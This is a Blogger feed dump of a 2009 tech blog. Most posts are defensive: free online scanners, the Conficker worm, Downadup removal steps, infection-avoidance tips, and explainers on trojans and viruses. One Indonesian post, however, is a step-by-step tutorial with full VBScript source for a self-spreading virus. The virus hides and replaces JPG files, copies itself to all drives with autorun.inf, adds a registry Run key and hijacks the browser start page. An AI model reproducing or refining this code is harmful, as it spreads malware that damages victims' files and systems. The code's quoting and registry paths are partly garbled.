tag:blogger.com,1999:blog-65605954035505663432024-03-13T23:50:45.293-07:00Flyboy OnlineBest blog to find latest news about technology, business, entertainment, politics, and many mored3d3http://www.blogger.com/profile/14058373421982422186noreply@blogger.comBlogger7125tag:blogger.com,1999:blog-6560595403550566343.post-10940506479399842302009-03-17T00:24:00.000-07:002009-03-17T00:46:12.596-07:008 Free Online Virus and Spyware Scanners to Protect Your PCKeeping your computer safe and secure these days can be quite a task. It seems that everywhere you look, people are trying to steal your personal data, infect your computer with a nasty virus, or trick you into clicking links that aren’t legitimate. As you are probably using your computer to tackle a number of increasingly personal tasks, it’s more important than ever to make sure you’re protected. If you’ve ever been a victim of a devastating virus that wiped out your hard drive or received a strange email that secretly emailed all of your contacts, you know the importance of keeping your PC safe.<div><br />While there’s no substitute for an updated real-time virus scanner installed on your computer, there are times when you may not have antivirus software installed, or it may be costly to purchase an additional license for a computer that isn’t often used. So, luckily there are many <strong>free online scan utilities</strong> out there available to you. In addition to being completely free and easy to use, you’ll also get a feel for how many of the different types of programs work. If you’re thinking about purchasing antivirus software for your computer, you can get a better idea of which one might be best for you after trying the online versions.<br /><span id="fullpost"><h2>Trend Micro HouseCall</h2><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_FnaS8cIU2Yw/Sb9Sfs6pQ-I/AAAAAAAAABk/cpOOO_sRndE/s1600-h/trendmicro-logo.jpg"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 275px; height: 90px;" src="http://1.bp.blogspot.com/_FnaS8cIU2Yw/Sb9Sfs6pQ-I/AAAAAAAAABk/cpOOO_sRndE/s320/trendmicro-logo.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5314056789907031010" /></a> Trend Micro HouseCall is an online application for checking whether your computer has been infected by viruses, spyware, or other malware. HouseCall performs additional security checks to identify and fix vulnerabilities to prevent reinfection. HouseCall works with most versions of Windows, and Mac OS 10.4 or higher and can be used with IE 6+ and Firefox. <a title="scan with Housecall" href="http://housecall.trendmicro.com/"><strong>Scan your computer with HouseCall now</strong></a>.<br /><h2>BitDefender</h2><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_FnaS8cIU2Yw/Sb9RebC7ekI/AAAAAAAAAA0/wMY9oD645Dc/s1600-h/bitdefender_logo-strapline-rgb.png"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 255px; height: 58px;" src="http://2.bp.blogspot.com/_FnaS8cIU2Yw/Sb9RebC7ekI/AAAAAAAAAA0/wMY9oD645Dc/s320/bitdefender_logo-strapline-rgb.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5314055668418443842" /></a>BitDefender Online Scanner is an on-demand virus scanner which incorporates the award-winning BitDefender scanning engines. You can use it to scan your system’s memory, all files and drives’ boot sectors, and to automatically clean infected files. You will need Internet Explorer to run this scan. <a title="BitDefender Online" href="http://www.bitdefender.com/scan8/ie.html"><strong>Use BitDefender today</strong></a>.<br /><h2>Symantec Norton Security Scan</h2><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_FnaS8cIU2Yw/Sb9SfsoyQ5I/AAAAAAAAABc/lyQMWKsa-PI/s1600-h/symantec.gif"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 163px; height: 42px;" src="http://2.bp.blogspot.com/_FnaS8cIU2Yw/Sb9SfsoyQ5I/AAAAAAAAABc/lyQMWKsa-PI/s320/symantec.gif" border="0" alt="" id="BLOGGER_PHOTO_ID_5314056789832123282" /></a>Symantec offers two different scanning options. You can scan for security problems or just do a virus scan. In addition, you can also opt to download a free version of the basic software to your computer so it runs automatically without requiring you to go online and manually run the scan. You will need IE 5+ with ActiveX in order to run the online version. <a title="norton security scan" href="http://security.symantec.com/sscv6/WelcomePage.asp"><strong>Try Symantec now</strong></a>.<br /><h2>F-Secure Online Scanner</h2><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_FnaS8cIU2Yw/Sb9ReZSwaYI/AAAAAAAAAAs/dhvhabbDu08/s1600-h/114px-f-secure_logosvg.png"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 114px; height: 120px;" src="http://3.bp.blogspot.com/_FnaS8cIU2Yw/Sb9ReZSwaYI/AAAAAAAAAAs/dhvhabbDu08/s320/114px-f-secure_logosvg.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5314055667947956610" /></a>F-Secure Online Virus Scanner is a free service. Use it to find out if your computer is infected, and disinfect your computer if needed. To use this scan, you will need to be running Windows and use Internet Explorer with javascript and ActiveX installed. In addition to the online virus scan, you may find the <a title="Health Check" href="http://support.f-secure.com/enu/home/onlineservices/fshc.shtml"><strong>F-Secure Health Check</strong></a> useful as well. The health check will scan your computer and applications to determine if there are any outdated software or other vulnerabilities detected. <a title="F-Secure online virus scanner" href="http://support.f-secure.com/enu/home/ols.shtml"><strong>Use the F-Secure online virus scanner</strong></a>.<br /><h2>McAfee Free Scan</h2><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_FnaS8cIU2Yw/Sb9RegG3p4I/AAAAAAAAABE/kwaOGZWdAyU/s1600-h/mcafee.gif"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 170px; height: 75px;" src="http://3.bp.blogspot.com/_FnaS8cIU2Yw/Sb9RegG3p4I/AAAAAAAAABE/kwaOGZWdAyU/s320/mcafee.gif" border="0" alt="" id="BLOGGER_PHOTO_ID_5314055669777147778" /></a>McAfee FreeScan helps you detect thousands of viruses on your computer. Based on the award-winning McAfee VirusScan engine, FreeScan searches for viruses, including the latest known “in the wild” viruses, and displays a detailed list of any infected files. Should viruses be found, FreeScan even provides links to more information about the viruses and what you can do to clean your system. <a title="McAfee Free Scan" href="http://home.mcafee.com/Downloads/FreeScan.aspx"><strong>Try McAfee Free Scan now</strong></a>.<br /><h2>CA Online Virus Scan</h2><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_FnaS8cIU2Yw/Sb9RegpOjBI/AAAAAAAAAA8/y2EJDWHGO0c/s1600-h/ca-logo.gif"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 159px; height: 42px;" src="http://2.bp.blogspot.com/_FnaS8cIU2Yw/Sb9RegpOjBI/AAAAAAAAAA8/y2EJDWHGO0c/s320/ca-logo.gif" border="0" alt="" id="BLOGGER_PHOTO_ID_5314055669921254418" /></a>Similar to the other scanners, this is a quick online tool that can scan your files for harmful files. The tool allows you to select specific drives or files if you don’t want to scan your entire computer, which is great if you just need to run a quick scan on something in particular. This tool also requires IE with ActiveX installed. <a title="CA Virus Scanner" href="http://www.ca.com/us/securityadvisor/virusinfo/scan.aspx"><strong>Try the CA virus scanner today</strong></a>.<br /><h2>ESET Nod32 Antivirus</h2><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_FnaS8cIU2Yw/Sb9ReulVHtI/AAAAAAAAABM/UOTfj-sJEsE/s1600-h/nod32_logo.jpg"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 132px; height: 88px;" src="http://1.bp.blogspot.com/_FnaS8cIU2Yw/Sb9ReulVHtI/AAAAAAAAABM/UOTfj-sJEsE/s320/nod32_logo.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5314055673663004370" /></a> The ESET Online Scanner claims to be the best free virus scan. “A user-friendly, powerful tool, our online antivirus utility can remove malware—viruses, spyware, adware, worms, trojans, and more—from any PC utilizing only a web browser. No installation required. The scanner uses the same ThreatSense® technology and signatures as ESET NOD32 Antivirus, which means it is always up-to-date.” I personally use NOD32 as my personal scanner and have purchased their scanning software. The online version does require IE with ActiveX. <a title="NOD32 Free Scan" href="http://www.eset.com/onlinescan/"><strong>Try the free online scan now</strong></a>.<br /><h2>Panda ActiveScan</h2><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_FnaS8cIU2Yw/Sb9SfoKyd-I/AAAAAAAAABU/e_zb33317No/s1600-h/panda.gif"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 320px; height: 35px;" src="http://2.bp.blogspot.com/_FnaS8cIU2Yw/Sb9SfoKyd-I/AAAAAAAAABU/e_zb33317No/s320/panda.gif" border="0" alt="" id="BLOGGER_PHOTO_ID_5314056788632565730" /></a> Panda’s ActiveScan is a robust online virus and malware scanner that goes beyond most conventional scanners. Collective Intelligence (scanning in-the-cloud) that detects malware that traditional security solutions cannot detect. If you create a free user account, you can also create custom scans and access your scan history. And even better, this is one of the few online scanners that will work with Firefox. <a title="Panda ActiveScan" href="http://www.pandasecurity.com/greece/homeusers/solutions/activescan/"><strong>Try Panda’s ActiveScan today</strong></a>.<br /></span></div>d3d3http://www.blogger.com/profile/14058373421982422186noreply@blogger.com2tag:blogger.com,1999:blog-6560595403550566343.post-2940585838619898572009-03-17T00:11:00.000-07:002009-03-17T00:18:36.087-07:00Cara Mudah Membuat Virus Dengan VBVirus komputer merupakan program komputer yang dapat menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain. Virus komputer dapat dianalogikan dengan virus biologis yang menyebar dengan cara menyisipkan dirinya sendiri ke sel makhluk hidup. Virus komputer dapat merusak (misalnya dengan merusak data pada dokumen), membuat pengguna komputer merasa terganggu, maupun tidak menimbulkan efek sama sekali. Virus yang akan kita coba buat kali ini akan dibuat dengan menggunakan Visual Basic Script. Terlebih dulu kira akan rencakan skenario kerja dari virus tersebut. Skenario virus tersebut adalah sebagai berikut:<div><ol><li>Virus akan mencari file-file .JPG pada folder dan subfolder satu tingkat didalamnya, setelah itu merubah ekstension file JPG tersebut menjadi JPEG dan merubah atributnya menjadi hidden file. Sehingga akan dikira file tersebut terhapus.</li><li>Meng-copy-kan dirinya (virus) dalam folder-folder tertentu dalam Windows</li><li>Memodifikasi Registry agar secara otomatis menjalankan script virus pada saat restart</li><li>Menularkan diri pada drive-drive yang aktif termasuk flash disk.</li><li>Membuat halaman HTML tertentu agar dijalankan pada start page di Internet Explorer</li></ol></div><div>Nah, demikianlah skenario virus yang akan kita buat. Untuk lebih jelasnya kita akan pelajari dari script dibawah ini:<br /><span id="fullpost"><br />1. Pada bagian ini akan dibuat sebuah prosedur untuk mencari file-file JPG dan merubahnya sesuai dengan skenario diatas<br /><span class="Apple-style-span" style="color: rgb(51, 102, 255);">Sub serangan_jpg(target)<br />on error resume next<br />set ftarget=fso.GetFile(target)<br />set fsource = fso.GetFile(Wscript.ScriptFullName)<br />ftarget.Copy(Left(target,instrrev(target,”.”)) & “jpeg”)<br />set fbackup = fso.GetFile(Left(target,instrrev(target,”.”)) & “jpeg”)<br />fbackup.Attributes = 2 fsource.Copy(Left(target,instrrev(target,”.”)) & “jpg ” & “.vbs”)<br />ftarget.Delete<br />ftarget.Close<br />fsource.Close<br />End Sub<br />Sub carifilejpg(folder)<br />For Each filetarget in fso.GetFolder(folder).Files<br />If (Right(filetarget,3)=”jpg”) then serangan_jpg(filetarget)<br />Next<br />End Sub</span><br /><br />2. Prosedur dibawah ini berfungsi untuk mencari drive yang aktif termasuk media flash disk dan kemudian menularinya.<br /><span class="Apple-style-span" style="color: rgb(51, 102, 255);">Sub serangan_drive()<br />Set fso = CreateObject(”Scripting.FileSystemObject”)<br />Set Drives=fso.drives<br />adaflashdisk = False<br />For Each drive in Drives<br />If drive.isready Then<br />fsource.Copy(drive & “” & “wolio.vbs”)<br />If drive.DriveType = 1 And drive.DriveLetter> “C:” Then adaflashdisk = True<br />End If<br />Next<br />If adaflashdisk = True Then<br />set fileautorun = fso.CreateTextFile(drive.DriveLetter & “” & “autorun.inf”,False)<br />fileautorun.WriteLine(”[AUTORUN]“)<br />fileautorun.WriteLine(”RUN=wolio.vbs”)<br />End If<br />End Sub</span><br /><br />3. Merubah Registry agar Start Page pada Internet Explorer menjalankan file HTML yang diinginkan.<br /><span class="Apple-style-span" style="color: rgb(51, 102, 255);">Sub serangan_ie()<br />If (regedit.RegRead(”HKEY_CURRENT_USERSOFTWAREMicrosoftInternet ExplorerMainStart<br />Page”)<>”c:windowssystem32wolio.html”) Then<br />regedit.RegWrite “HKEY_CURRENT_USERSOFTWAREMicrosoftInternet ExplorerMainStart<br />Page”,”c:windowssystem32wolio.html”<br />End If<br />End Sub</span><br /><br />4. Bagian ini digunakan untuk membuat sebuah file HTML yang akan menjalankan script virus<br /><span class="Apple-style-span" style="color: rgb(51, 102, 255);">Sub buat_html()<br />set filehtml = fso.CreateTextFile(”c:windowssystem32wolio.html”,True)<br />filehtml.WriteLine(””)<br />filehtml.WriteLine(””)<br />“)<br />filehtml.WriteLine(”Welcome to Wolio”)<br />filehtml.WriteLine(”filehtml.WriteLine(””)<br />filehtml.WriteLine(””)<br />filehtml.WriteLine(””)<br />filehtml.WriteLine(””)<br />filehtml.WriteLine(””)<br />filehtml.WriteLine(”Selamat Datang di Wolio VBS “)<br />filehtml.WriteLine(””)<br />filehtml.WriteLine(””)<br />End Sub</span><br /><br />5. Pada bagian ini akan mencari folder yang ada dan menularinya dengan script virus<br /><span class="Apple-style-span" style="color: rgb(51, 102, 255);">Sub serangan_folder(foldername)<br />on error resume next</span><br /><br />For Each subfolder in fso.GetFolder(foldername).SubFolders<br />fsource.Copy(subfolder & “wolio.vbs”)<br />carifilejpg(subfolder)<br />next<br /><span class="Apple-style-span" style="color: rgb(51, 102, 255);">End Sub</span><br /><br />6. Bagian dibawah ini adalah bagian yang utama gunanya untuk mendeklarasikan variabel dan memangggil semua prosedur<br /><span class="Apple-style-span" style="color: rgb(51, 102, 255);">on error resume next<br />dim fso, fsource, ftarget, fbackup, scriptname, myfolder, subfolder, preview, filetarget, sys, regedit, drive,<br />filehtml, fileautorun<br />dim adaflashdisk</span><br /><br />set fso = CreateObject(”Scripting.FileSystemObject”)<br />set fsource = fso.GetFile(Wscript.ScriptFullName)<br />set regedit=CreateObject(”WScript.Shell”)<br /><br />myfolder = Left(fsource,InStrRev(fsource,””))<br />‘ Copy-kan diri ke “c:windowssystem32″<br /><br />fsource.Copy(”c:windowssystem32wolio.vbs”)<br />‘ Cari dan infeksi file JPG didalam folder<br />carifilejpg(myfolder)<br />‘ Copy-kan diri di sub folder yang ada<br />serangan_folder(myfolder)<br />‘ Regitry<br />if<br />(regedit.RegRead(”HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunWolio”)<>”c:win<br />dowssystem32wolio.vbs”) Then<br />regedit.RegWrite<br />“HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunWolio”,”c:windowssystem32wolio.<br />vbs”<br />End If<br />‘ Copy-kan diri ke semua drive aktif<br />serangan_drive()<br />‘ Buat file wolio.html<br />buat_html()<br />‘ Ubah Start Page di Internet Explorer<br />serangan_ie()<br /><br />Demikianlah artikel tentang cara pembuatan dan penuluran sebuah virus yang dibuat dengan VBS. Setelah mengetahui teknik penyebaran suatu virus yang dibuat dengan VBS, maka diharapkan kepada Anda agar dapat melakukan pencegahan. Virus yang kita pelajari kali ini sebenarnya hanya virus yang “bodoh”, ini hanya membuka wacana Anda terhadap bahaya dari virus yang dibuat dengan VBS. Semoga artikel ini dapat bermanfaat.<br /><br /></span></div>d3d3http://www.blogger.com/profile/14058373421982422186noreply@blogger.com0tag:blogger.com,1999:blog-6560595403550566343.post-33628233244999860902009-03-16T23:48:00.000-07:002009-03-17T00:03:37.669-07:00Dangerous Worm Eating 1 Million PC in 24 Hours<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_FnaS8cIU2Yw/Sb9KaOJIIbI/AAAAAAAAAAk/YoUU1JCJYw4/s1600-h/news-zotob-worm.jpg"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 250px; height: 320px;" src="http://2.bp.blogspot.com/_FnaS8cIU2Yw/Sb9KaOJIIbI/AAAAAAAAAAk/YoUU1JCJYw4/s320/news-zotob-worm.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5314047899653906866" /></a><br />All types of PC have the same enemy that is a virus, trojan, worm. If your PC using Windows software, so be careful with attacks from the worm called <span class="Apple-style-span" style="font-weight: bold;">"Downadup"</span>. This worm is able to destroy more than one million Windows PC in 24 hours.<br /><br />This Worm is also called <span class="Apple-style-span" style="font-weight: bold;">"Conficker"</span>. It’s exploit a bug in the Windows Server service that used in all versions of Microsoft operating systems, such as Windows 2000, XP, Vista, Server 2003 and Server 2008. <br /><span id="fullpost"><br />Finnish security company, F-Secure, estimates that the number of PCs who infected with worm called "Downadup" is now increased from the previous number of 2.4 million to 3.5 million.<br /><br />Until now, the largest number of infections occur in the United States, Canada, Mexico, Korea, and some European countries, including English, French and German.<br /></span>d3d3http://www.blogger.com/profile/14058373421982422186noreply@blogger.com0tag:blogger.com,1999:blog-6560595403550566343.post-14339770662518705572009-03-16T23:05:00.000-07:002009-03-16T23:45:53.507-07:009 Step to Remove W32.Downadup.B VirusW32.Downadup.B Virus was discovered by Symantec last December 30, 2008, and was announce to public January 9, 2009. Now it widely spreading all over the world and it floodings network connections.<br /><br />This virus monitors DNS requests to domains containing certain strings and blocks access to those domains so that it will appear that the network request timed out. We (my MIS Team) discovered W32.Downadup.B Virus from our quarantine logs and we found out that it was introduce to the network using a USB drive activated by autorun.inf.<br /><br />W32.Downadup.B creates an autorun.inf file on all mapped drives so that the threat automatically executes when the drive is accessed. The threat then monitors for drives that are connected to the compromised computer in order to create an autorun.inf file as soon as the drive becomes accessible.<br /><br />You won’t be able to detect it using the command prompt because it run by using the RPC Handling Remote Code Execution. How to remove the virus just follow the steps below:<br /><span id="fullpost"><br /><ol><li>Download the removal tool from <a href="http://www.symantec.com/content/en/us/global/removal_tool/threat_writeups/FixDownadup.exe" target="new"><span class="Apple-style-span" style="color: rgb(51, 102, 255);">Symantec website</span></a> and place it on your desktop.</li><li>Download the Security patch from microsoft website. ( Choose the file support with your OS).<a href="http://www.microsoft.com/downloads/details.aspx?familyid=0D5F9B6E-9265-44B9-A376-2067B73D6A03&displaylang=enhttp://www.microsoft.com/downloads/details.aspx?familyid=0D5F9B6E-9265-44B9-A376-2067B73D6A03&displaylang=en" target="new" style=""><span class="Apple-style-span" style="text-decoration: none; "><span class="Apple-style-span" style="color: rgb(51, 102, 255);"> </span></span></a><a href="http://www.microsoft.com/downloads/details.aspx?familyid=0D5F9B6E-9265-44B9-A376-2067B73D6A03&displaylang=enhttp://www.microsoft.com/downloads/details.aspx?familyid=0D5F9B6E-9265-44B9-A376-2067B73D6A03&displaylang=en" target="new"><span class="Apple-style-span" style="color: rgb(51, 102, 255);">for Windows XP (KB958644)</span></a></li><li>Temporarily Disable System Restore (Windows Me/XP).</li><li>Update the virus definitions (If your using Symantec).</li><li>Reboot your computer in SafeMode.</li><li>Run the FixDownadup.exe that you have just downloaded and let it scan until it found a viruses.</li><li>Run the Security Patch.</li><li>Reboot your system in normal mode and run the Full System Scan to make sure that no virus present on your computer.</li><li>As preventive measure We disabled autorun in the registry and disable USB Port access to all workstation.</li></ol><br /></span>d3d3http://www.blogger.com/profile/14058373421982422186noreply@blogger.com0tag:blogger.com,1999:blog-6560595403550566343.post-27574354158178541002008-12-30T22:32:00.000-08:002009-03-15T01:34:23.297-07:00Tips On Avoiding Virus Infection<ol><li>Install anti-virus software from a well-known, reputable company, UPDATE it regularly, and USE it regularly. New viruses come out every single day; an a-v program that hasn't been updated for several months will not provide much protection against current viruses.</li><li>In addition to scanning for viruses on a regular basis, install an 'on access' scanner (included in most good a-v software packages) and configure it to start automatically each time you boot your system. This will protect your system by checking for viruses each time your computer accesses an executable file.</li><li>Virus scan any new programs or other files that may contain executable code before you run or open them, no matter where they come from. There have been cases of commercially distributed floppy disks and CD-ROMs spreading virus infections.</li><li>Anti-virus programs aren't very good at detecting Trojan horse programs, so be extremely careful about opening binary files and Word/Excel documents from unknown or 'dubious' sources. This includes posts in binary newsgroups, downloads from web/ftp sites that aren't well-known or don't have a good reputation, and executable files unexpectedly received as attachments to E-mail or during an on-line chat session.</li><li>If your E-mail or news software has the ability to automatically execute JavaScript, Word macros, or other executable code contained in or attached to a message, I strongly recommend that you disable this feature.<span id="fullpost"></span></li><li>Be _extremely_ careful about accepting programs or other files during on-line chat sessions: this seems to be one of the more common means that people wind up with virus or Trojan horse problems. And if any other family members (especially younger ones) use the computer, make sure they know not to accept any files while using chat.</li><li>Do regular backups. Some viruses and Trojan horse programs will erase or corrupt files on your hard drive, and a recent backup may be the only way to recover your data.<br /></li></ol>Ideally, you should back up your entire system on a regular basis. If this isn't practical, at least backup files that you can't afford to lose or that would be difficult to replace: documents, bookmark files, address books, important E-mail, etc.<br /></span>d3d3http://www.blogger.com/profile/14058373421982422186noreply@blogger.com0tag:blogger.com,1999:blog-6560595403550566343.post-1903022353506609052008-12-30T22:29:00.000-08:002008-12-30T22:31:13.670-08:00Trojan horse, Friend or EnemyIn the context of computing and software, a Trojan horse, also known as a trojan, is malware that appears to perform a desirable function but in fact performs undisclosed malicious functions. Therefore, a computer worm or virus may be a Trojan horse.<br /><br />Trojan horse payloads are almost always designed to cause harm, but can also be harmless. They are classified based on how they breach and damage systems. The six main types of Trojan horse payloads are:<span id="fullpost"><br /><ol><li>Remote Access</li><li>Data Destruction</li><li>Downloader</li><li>Server Trojan(Proxy, FTP , IRC, Email, HTTP/HTTPS, etc.)</li><li>Security software disabler</li><li>Denial-of-service attack (DoS)<br /></li></ol>Some examples of damage are:<br /><ol><li>Erasing or overwriting data on a computer</li><li>Re-installing itself after being disabled</li><li>Encrypting files in a cryptoviral extortion attack</li><li>Corrupting files in a subtle way</li><li>Upload and download of files</li><li>Copying fake links, which lead to false websites, chats, or other account based websites, showing any local account name on the computer falsely engaging in untrue context</li><li>Falsifying records of downloading software, movies, or games from websites never visited by the victim.</li><li>Allowing remote access to the victim's computer. This is called a RAT (remote access Trojan)</li><li>Spreading other malware, such as viruses (this type of trojan horse is called a 'dropper' or 'vector')</li><li>Setting up networks of zombie computers in order to launch DDoS attacks or send spam.</li><li>Spying on the user of a computer and covertly reporting data like browsing habits to other people (see the article on spyware)</li><li>Making screenshots</li><li>Logging keystrokes to steal information such as passwords and credit card numbers</li><li>Phishing for bank or other account details, which can be used for criminal activities</li><li>Installing a backdoor on a computer system</li><li>Opening and closing CD-ROM tray</li><li>Playing sounds, videos or displaying images</li><li>Calling using the modem to expensive numbers, thus causing massive phone bills</li><li>Harvesting e-mail addresses and using them for spam</li><li>Restarting the computer whenever the infected program is started</li><li>Deactivating or interfering with anti-virus and firewall programs</li><li>Deactivating or interfering with other competing forms of malware.</li><li>Randomly shutting off the computer</li><li>Installing a virus</li><li>slowing down your computer</li><li>displaying pornographic sites<br /></li></ol>Since Trojan horses have a variety of forms, there is no single method to delete them. The simplest responses involve clearing the temporary internet files file and deleting it manually. Normally, anti-virus software is able to detect and remove the trojan automatically. If the antivirus cannot find it, booting the computer from alternate media(cd) may allow an antivirus program to find a trojan and delete it. Updated anti-spyware programs are also efficient against this threat.<br /><br />Trojans usually consist of two parts, a Client and a Server. The server is run on the victim's machine and listens for connections from a Client used by the attacker.When the server is run on a machine it will listen on a specific port or multiple ports for connections from a Client. In order for an attacker to connect to the server they must have the IP Address of the computer where the server is being run. Some trojans have the IP Address of the computer they are running on sent to the attacker via email or another form of communication. Once a connection is made to the server, the client can then send commands to the server; the server will then execute these commands on the victim's machine.<br /><br />Today, with NAT infrastructure being common, most computers cannot be reached by their external IP address. Therefore many trojans now connect to the computer of the attacker, which has been set up to take the connections, instead of the attacker connecting to the victim. This is called a 'reverse-connect' trojan. Many trojans nowadays also bypass many personal firewall installed on the victims computer.</span>d3d3http://www.blogger.com/profile/14058373421982422186noreply@blogger.com0tag:blogger.com,1999:blog-6560595403550566343.post-24888779553848271962008-12-30T22:21:00.000-08:002008-12-30T23:23:22.377-08:00Bad Dream Called Computer Virus1. What is a computer virus?<br /><br />A computer virus is a program designed to spread itself by first infecting executable files or the system areas of hard and floppy disks and then making copies of itself. Viruses usually operate without the knowledge or desire of the computer user.<br /><br />2. What kind of files can spread viruses?<br /><br />Viruses have the potential to infect any type of executable code, not just the files that are commonly called 'program files'. For example, some viruses infect executable code in the boot sector of floppy disks or in system areas of hard drives. Another type of virus, known as a 'macro' virus, can infect word processing and spreadsheet documents that use<br />macros. And it's possible for HTML documents containing JavaScript or other types of executable code to spread viruses or other malicious code.<br /><br />Since virus code must be executed to have any effect, files that the computer treats as pure data are safe. This includes graphics and sound files such as .gif, .jpg, .mp3, .wav, etc., as well as plain text in .txt files. For example, just viewing picture files won't infect your computer with a virus. The virus code has to be in a form, such as an .exe program<br />file or a Word .doc file, that the computer will actually try to execute.<br /><br />3. How do viruses spread?<br /><span id="fullpost"><br />When you execute program code that's infected by a virus, the virus code will also run and try to infect other programs, either on the same computer or on other computers connected to it over a network . And the newly infected programs will try to infect yet more programs.<br /><br />When you share a copy of an infected file with other computer users, running the file may also infect their computers; and files from those computers may spread the infection to yet more computers.<br /><br />If your computer is infected with a boot sector virus, the virus tries to write copies of itself to the system areas of floppy disks and hard disks. Then the infected floppy disks may infect other computers that boot from them, and the virus copy on the hard disk will try to infect still more floppies.<br /><br />Some viruses, known as 'multipartite' viruses, can spread both by infecting files and by infecting the boot areas of floppy disks.<br /><br />4. What do viruses do to computers?<br /><br />Viruses are software programs, and they can do the same things as any other programs running on a computer. The actual effect of any particular virus depends on how it was programmed by the person who wrote the virus.<br /><br />Some viruses are deliberately designed to damage files or otherwise interfere with your computer's operation, while others don't do anything but try to spread themselves around. But even the ones that just spread themselves are harmful, since they damage files and may cause other problems in the process of spreading.<br /><br />Note that viruses can't do any damage to hardware: they won't melt down your CPU, burn out your hard drive, cause your monitor to explode, etc. Warnings about viruses that will physically destroy your computer are usually hoaxes, not legitimate virus warnings.<br /><br />5. What's the story on viruses and E-mail?<br /><br />You can't get a virus just by reading a plain-text E-mail message or Usenet post. What you have to watch out for are encoded messages containing embedded executable code (i.e., JavaScript in an HTML message) or messages that include an executable file attachment (i.e., an encoded program file or a Word document containing macros).<br /><br />In order to activate a virus program, your computer has to execute some type of code. This could be a program attached to an E-mail, a Word document you downloaded from the Internet, or something received on a floppy disk. There's no special hazard in files attached to Usenet posts or E-mail messages: they're no more dangerous than any other file.</span>d3d3http://www.blogger.com/profile/14058373421982422186noreply@blogger.com0